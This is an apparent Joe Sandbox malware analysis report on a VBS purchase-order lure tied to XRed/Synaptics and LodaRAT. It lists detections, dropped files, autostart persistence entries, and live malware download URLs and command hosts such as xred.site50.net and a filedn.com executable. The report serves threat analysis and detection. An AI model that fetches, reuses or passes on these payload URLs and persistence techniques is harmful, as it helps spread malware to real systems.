                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta6R
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 204748942|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta:SystemRoot=C:\Windows
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|EM`,
                            Source: Yara matchFile source: Process Memory Space: ._cache_Google.exe PID: 7960, type: MEMORYSTR

                            Remote Access Functionality

                            Source: Yara matchFile source: Process Memory Space: ._cache_Google.exe PID: 7960, type: MEMORYSTR
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 3.0.Google.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.1489443918.000001C7E5723000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1491842358.000001C7E51B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7732, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Google.exe PID: 7912, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4FAD.tmp, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_005091DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,4_2_005091DC
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_005096E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,4_2_005096E2
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C991DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,13_2_00C991DC
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C996E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,13_2_00C996E2
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B191DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,32_2_00B191DC
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B196E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,32_2_00B196E2
[MITRE ATT&CK matrix; tactic columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact]
[Behavior graph. Behavior Graph ID: 1582355, Sample: Open Purchase Order Summary..., Startdate: 30/12/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
Open Purchase Order Summary Sheet.vbs | 39% | Virustotal | | Browse
Open Purchase Order Summary Sheet.vbs | 26% | ReversingLabs | Win32.Trojan.Valyria |
Source | Detection | Scanner | Label | Link
C:\Users\user\Documents\LSBIHQFDVT\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH |
C:\Users\user\Documents\LSBIHQFDVT\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | HEUR/AGEN.1353217 |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\AppData\Local\Temp\UAINOJ.vbs | 100% | Avira | VBS/Runner.VPJI |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe | 100% | Avira | TR/Dldr.Agent.SH |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe | 100% | Avira | HEUR/AGEN.1353217 |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe | 100% | Avira | HEUR/AGEN.1353217 |
C:\ProgramData\Synaptics\RCX4FAD.tmp | 100% | Avira | TR/Dldr.Agent.SH |
C:\ProgramData\Synaptics\RCX4FAD.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\Documents\IPKGELNTQY\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH |
C:\Users\user\Documents\IPKGELNTQY\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe | 100% | Avira | TR/Dldr.Agent.SH |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe | 100% | Avira | HEUR/AGEN.1353217 |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\AppData\Local\Temp\._cache_Google.exe | 100% | Avira | HEUR/AGEN.1353217 |
C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | 100% | Avira | HEUR/AGEN.1353217 |
C:\Users\user\Documents\LSBIHQFDVT\~$cache1 | 100% | Joe Sandbox ML | |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\Synaptics\RCX4FAD.tmp | 100% | Joe Sandbox ML | |
C:\Users\user\Documents\IPKGELNTQY\~$cache1 | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\._cache_Google.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\Synaptics\RCX4FAD.tmp | 92% | ReversingLabs | Win32.Worm.Zorex |
C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
C:\Users\user\AppData\Local\Temp\._cache_Google.exe | 61% | ReversingLabs | Win32.Trojan.Lisk |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe | 61% | ReversingLabs | Win32.Trojan.Lisk |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | 61% | ReversingLabs | Win32.Trojan.Lisk |
C:\Users\user\Documents\IPKGELNTQY\~$cache1 | 92% | ReversingLabs | Win32.Worm.Zorex |
C:\Users\user\Documents\LSBIHQFDVT\~$cache1 | 92% | ReversingLabs | Win32.Worm.Zorex |
                            No Antivirus matches
                            No Antivirus matches
Source | Detection | Scanner | Label | Link
http://xred.site50.net/syn/SSLLibrary.dl | 100% | Avira URL Cloud | malware |
https://drive.usercontenI | 0% | Avira URL Cloud | safe |
https://docs.goou0 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
freedns.afraid.org | 69.42.215.252 | true | false | | high
docs.google.com | 142.250.185.78 | true | false | | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
drive.usercontent.google.com | 142.250.185.161 | true | false | | high
filedn.com | 23.109.93.100 | true | false | | high
xred.mooo.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
xred.mooo.com | false | | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                            high
                                                                                                                            https://docs.google.com/uc?id=0;Synaptics.exe, 00000007.00000002.1740188857.0000000004C5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2335565313.000000001A8FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2276373803.000000000D4BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2320961601.00000000157BE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://crl.vwscript.exe, 00000000.00000002.1495561900.000001C7E50D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=HGoogle.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://xred.site50.net/syn/SSLLibrary.dllGoogle.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlGoogle.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.78 | docs.google.com | United States | 15169 | GOOGLEUS | false
172.111.138.100 | unknown | United States | 3223 | VOXILITYGB | true
69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false
142.250.185.161 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
23.109.93.100 | filedn.com | Netherlands | 7979 | SERVERS-COMUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582355
Start date and time: 2024-12-30 11:47:39 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 38
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Open Purchase Order Summary Sheet.vbs
Detection: MAL
Classification: mal100.troj.adwa.expl.evad.winVBS@30/79@12/5
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 90
• Number of non-executed functions: 275
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.76.240, 184.28.90.27, 52.113.194.132, 20.42.65.84, 52.168.117.173, 20.189.173.17, 20.42.73.29, 4.175.87.197, 40.126.32.136, 13.107.246.45
                                                                                                                                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, onedscolprdwus22.westus.cloudapp.azure.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedscolprdeus02.eastus.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft
• Execution Graph export aborted for target Synaptics.exe, PID 8060 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:48:53 | API Interceptor | 401x Sleep call for process: Synaptics.exe modified
05:49:06 | API Interceptor | 3x Sleep call for process: WerFault.exe modified
11:48:43 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
11:48:48 | Task Scheduler | Run new task: UAINOJ.exe path: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
11:48:53 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UAINOJ "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
11:49:01 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
11:49:09 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UAINOJ "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
11:49:17 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
11:49:26 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnk
11:49:39 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                                                          • 13.107.246.45
                                                                                                                                                          freedns.afraid.orgPurchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          docx.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
                                                                                                                                                          hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                          • 69.42.215.252
Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 118
Entropy (8bit): 3.5700810731231707
Encrypted: false
SSDEEP: 3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5: 573220372DA4ED487441611079B623CD
SHA1: 8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256: BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512: F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious: false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.1286677841855057
Encrypted: false
SSDEEP: 192:45iHVpsvI4b0BU/3DzJDzqjUz4B9lyQwzuiFjZ24IO8EKDzy:CWyvXoBU/3Jqjp+zuiFjY4IO8zy
MD5: 1289594D6B36003DCB6CB35061D3EC46
SHA1: 96DBFB3A656FA089DDCF089653A948CBB5C800DB
SHA-256: DE4A37C508A96B9CCB60F9095A0FDDD167D58BA144526979BA89DFCAC18807EE
SHA-512: D5B61C90C56F32AB98CCD85098F4F3AAF9C4889561DF587E4D616A9199656E9AA4D9F461ECB2AC7D4FB0B07C61B9CA1D65519A5E9AC80C7230FB7708EF672477
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.9.3.8.9.2.4.7.3.2.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.9.3.9.5.1.5.3.5.8.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.7.f.b.9.7.3.-.4.f.b.7.-.4.0.b.d.-.9.c.7.6.-.a.7.4.8.e.a.6.e.3.1.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.8.8.6.3.0.3.-.f.0.0.d.-.4.0.7.b.-.b.6.b.6.-.3.1.2.1.e.f.1.b.b.3.2.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.3.4.-.0.0.0.1.-.0.0.1.4.-.6.e.9.2.-.b.5.7.4.a.8.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.6.c.2.b.a.a.7.2.e.a.5.d.0.8.b.6.5.8.3.8.9.3.b.0.1.0.0.1.e.5.4.0.2.1.3.f.4.a.a.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):1.1337945178120208
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:7ifitVpsLI40vvNekLDzJDzqjLOAPV0dsJzuiF+Z24IO8EKDzy:GfUyLWvvNekLJqj8CzuiF+Y4IO8zy
                                                                                                                                                                          MD5:067282B20315DC390D5B37F6FBF92EF9
                                                                                                                                                                          SHA1:8A3CAA41608CEE5EDF503C91C35F0864993814B9
                                                                                                                                                                          SHA-256:19253979AB9E62CDE61912561651A7D4DF8650649B53AA83D15B770569A3BE80
                                                                                                                                                                          SHA-512:6BB60E4A6A2E9B2BC15D6CE6DAB5F7F77536F1F5DE325D80D1507C9966978443952C163ABA37382D342134B381B95A3184E9A82EF9C051F1AEB5952E1382DE9C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.9.3.3.9.1.8.5.0.0.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.9.3.4.4.4.3.5.0.3.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.7.0.2.f.c.2.-.6.2.c.7.-.4.b.0.6.-.b.7.f.c.-.8.4.4.3.8.3.9.7.5.1.7.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.4.f.b.0.5.d.-.8.6.4.2.-.4.9.a.6.-.8.6.4.e.-.f.2.7.6.d.7.2.9.1.4.f.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.7.c.-.0.0.0.1.-.0.0.1.4.-.3.e.d.3.-.7.c.6.5.a.8.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.6.c.2.b.a.a.7.2.e.a.5.d.0.8.b.6.5.8.3.8.9.3.b.0.1.0.0.1.e.5.4.0.2.1.3.f.4.a.a.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):1.1337165992886953
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:E0ftVpsII40WbkODzJDzqjLOAPV0dsJzuiF+Z24IO8EKDzy:9yIWWbkOJqj8CzuiF+Y4IO8zy
                                                                                                                                                                          MD5:27B156E1786606D1F439C7CD7F00F96F
                                                                                                                                                                          SHA1:B8EA2EC046B47130CCFA19D68AAF6BAE87E10530
                                                                                                                                                                          SHA-256:9CE604F42D8E357CDBDA9E43C73C622C72EA1DCA3A999FA59216124D8CE19886
                                                                                                                                                                          SHA-512:D0F313CB52365FB51E5BB0E6C78FDC13A9C93D092F0CDBD187AE06EC6BAE03600301693B2F52972089372B2FADCB6575E4CABEDE37801F0E358B0D66AB8F9DCB
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.9.3.4.7.0.2.1.9.8.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.9.3.4.7.7.0.9.4.9.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.8.6.4.6.d.f.-.f.a.1.c.-.4.0.5.7.-.9.b.6.a.-.2.4.f.b.6.a.f.c.6.9.4.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.0.8.7.9.6.6.-.9.e.1.f.-.4.7.0.4.-.9.0.6.5.-.e.7.4.b.4.a.b.9.2.8.c.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.7.c.-.0.0.0.1.-.0.0.1.4.-.3.e.d.3.-.7.c.6.5.a.8.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.6.c.2.b.a.a.7.2.e.a.5.d.0.8.b.6.5.8.3.8.9.3.b.0.1.0.0.1.e.5.4.0.2.1.3.f.4.a.a.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Dec 30 10:49:50 2024, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):3073914
                                                                                                                                                                          Entropy (8bit):2.3274723373890502
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:qkWKkxDLXntJni4forp7T2sBCnRke3jTCaD:/W3DbtJnTfor52Xke3j
                                                                                                                                                                          MD5:5B6A20927752DEEEFA5B7A2BB0ACABC8
                                                                                                                                                                          SHA1:F195D8AE611AD2D1CFE9AA9171C49BFCDEE282A7
                                                                                                                                                                          SHA-256:E1090B4E6EBF966DCC3E8EF26CD3EE35CC77B02FF7AE98651CCC201555DFA120
                                                                                                                                                                          SHA-512:1F916F8815214F5D9733EEE2FB0258998EF63F9F74707ED99226D231525ABBAC40937AB06F2DC51A452F9982BC1F5A1E728854BD51B1F8EB2BA35BDA727AA391
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):8356
                                                                                                                                                                          Entropy (8bit):3.698536941929479
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:R6l7wVeJMxU6us6YSRSUTgmfik4c5Yprw89bTgsfWQxm:R6lXJj6us6YkSUTgmft4c2TzfWb
                                                                                                                                                                          MD5:17C6137ACD3E8057DE1C50E9E0A4BAD5
                                                                                                                                                                          SHA1:612BA79597D4CE5F6663A9FB09D34B9FA4BDE486
                                                                                                                                                                          SHA-256:641D1073EC30EB206155A95DD3417E5655ED3E0ECFAD1D90CF7EB6CD76CB5B72
                                                                                                                                                                          SHA-512:D22416BED85171FB3982344348C6C758802C819358A8A1188A95A0F025526131867F8EDEEEEC28A9453612945349AD9335E0A1F7B91BA60B0D6463D6B0156EE4
                                                                                                                                                                          Malicious:false
